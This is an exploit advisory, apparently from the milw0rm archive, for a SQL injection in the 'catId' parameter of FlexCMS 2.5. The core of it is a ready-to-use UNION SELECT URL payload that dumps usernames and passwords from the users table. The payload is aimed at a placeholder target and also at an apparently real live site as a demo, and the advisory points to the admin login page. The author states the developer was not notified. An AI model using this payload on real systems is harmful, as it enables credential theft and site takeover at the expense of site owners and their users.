FlexCMS 2.5 - 'catId' SQL Injection



EKU-ID: 15851 CVE: OSVDB-51992;CVE-2009-1256;CVE-2009-0534 OSVDB-ID:
Author: MisterRichard Published: 2009-02-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


AUTHOR: MisterRichard

FlexCMS Remote SQL Injection

Discovered by MisterRichard.

Developer site: http://www.flexcms.dk/

Developer has not been notified.

Live demo:

Injection: www.target.com/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--

http://www.radikalungdom.dk/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--

Admin login site:

http://target.com/flexadmin/

Greetz, agonx, kollek, cardingnu

# milw0rm.com [2009-02-09]